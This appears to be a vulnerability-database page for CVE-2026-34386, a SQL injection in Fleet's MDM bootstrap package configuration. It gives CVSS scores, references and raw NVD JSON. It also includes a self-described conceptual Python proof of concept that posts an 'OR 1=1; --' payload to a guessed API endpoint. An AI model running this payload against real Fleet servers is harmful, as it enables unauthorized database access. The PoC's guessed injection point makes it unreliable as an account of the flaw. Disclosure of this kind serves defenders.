CVE-2026-34386

Description

Fleet is open source device management software. Prior to 4.81.0, a SQL injection vulnerability in Fleet's MDM bootstrap package configuration allows an authenticated user with Team Admin or Global Admin privileges to modify arbitrary team configurations, exfiltrate sensitive data from the Fleet database, and inject arbitrary content into team configs via direct API calls. Version 4.81.0 patches the issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE

Fleet < 4.81.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual Proof of Concept for CVE-2026-34386
# Target: Fleet MDM bootstrap package configuration endpoint
# Note: Requires valid Team Admin or Global Admin credentials

target_url = "https://<fleet-domain>/api/v1/fleet/mdm/bootstrap/packages"
api_token = "<YOUR_ADMIN_API_TOKEN>"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json"
}

# The injection point is likely within the package configuration parameters
# This payload attempts a basic SQL injection to test vulnerability
malicious_payload = {
    "name": "TestPackage' OR 1=1; --",
    "description": "Testing SQL injection via bootstrap package"
}

try:
    response = requests.post(target_url, json=malicious_payload, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Analyze response and server logs for SQL execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34386
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34386
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34386/
[4] VulDB https://vuldb.com/cve/CVE-2026-34386
[5] https://github.com/fleetdm/fleet/security/advisories/GHSA-9p23-p2m4-2r4m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34386", "sourceIdentifier": "[email protected]", "published": "2026-03-27T19:16:43.427", "lastModified": "2026-04-02T17:04:41.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fleet is open source device management software. Prior to 4.81.0, a SQL injection vulnerability in Fleet's MDM bootstrap package configuration allows an authenticated user with Team Admin or Global Admin privileges to modify arbitrary team configurations, exfiltrate sensitive data from the Fleet database, and inject arbitrary content into team configs via direct API calls. Version 4.81.0 patches the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.81.0", "matchCriteriaId": "84AB2C74-C556-4B42-9A54-A5B201D1BDC3"}]}]}], "references": [{"url": "https://github.com/fleetdm/fleet/security/advisories/GHSA-9p23-p2m4-2r4m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}